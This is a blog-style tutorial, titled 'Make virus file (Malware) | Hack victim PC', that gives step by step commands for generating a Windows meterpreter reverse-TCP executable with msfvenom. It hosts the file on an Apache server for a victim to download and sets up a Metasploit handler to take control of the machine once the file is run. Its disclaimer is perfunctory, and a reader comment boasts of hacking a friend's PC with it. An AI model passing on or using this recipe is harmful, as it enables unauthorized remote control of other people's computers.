Headlines
Loading...
Make virus file (Malware) | Hack victim PC | Hack system by sending virus.

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.
Make virus Malware
                                         This video is for educational purpose. Don't use it for bad purpose.
                                             I will not responsible for any bad and illegal activity.

First of all, open the terminal of the Kali Linux.
After opening the terminal, we need to make a payload. We write

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.141 LPORT=4444 --format=exe > /root/Desktop/virus.exe

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.
It creates a virus file in the root folder.

Here you need to check your IP Address. So, we open a new terminal from Ctrl Shift + N. After checking the IP Address close this terminal.

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.

Copy virus.exe file from Desktop to /var/www/html folder



After copy the virus file close that window.

Now, open a new terminal and run the apache service. This makes an online server where from we download the virus file.

service apache2 start                                          service postgresql start

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.

After running apache service, you need to open the MetaSploit Framework

msfconsole

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.
After the opening of msfconsole, use these highlighted command.

use exploit/multi/handler

Then, set payload

set payload windows/meterpreter/reverse_tcp

After setting payload, set your LHOST

set LHOST 192.168.43.141

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.
After setting the LHOST, set your LPORT.

 set LPORT 4444

After you set your LPORT, you need to exploit it

exploit

meterpreter_> help

Make virus file (Malware) | Hack victim PC | Hack system by sending virus.


These are all commands that will show on the terminal when you write help command after the meterpreter session has been started.

If someone open this link and run it as administrator the meterpreter session has been started.
You can check all the commands by typing help command.
You can download this virus file by typing "Your IP/File Name" in your chrome and any search engine search bar.

192.168.43.141/virus.exe

Note:
    There are some important points that helps you in writing the commands.
    You will need to take care of lower case and upper case letters in commands. Take care of spaces, dashes, hyphens, slashes and underscores. 

1 comment

  1. Great. I use it and hack my friends pc by sending virus file. It's working.

    ReplyDelete

Thanks for your comment.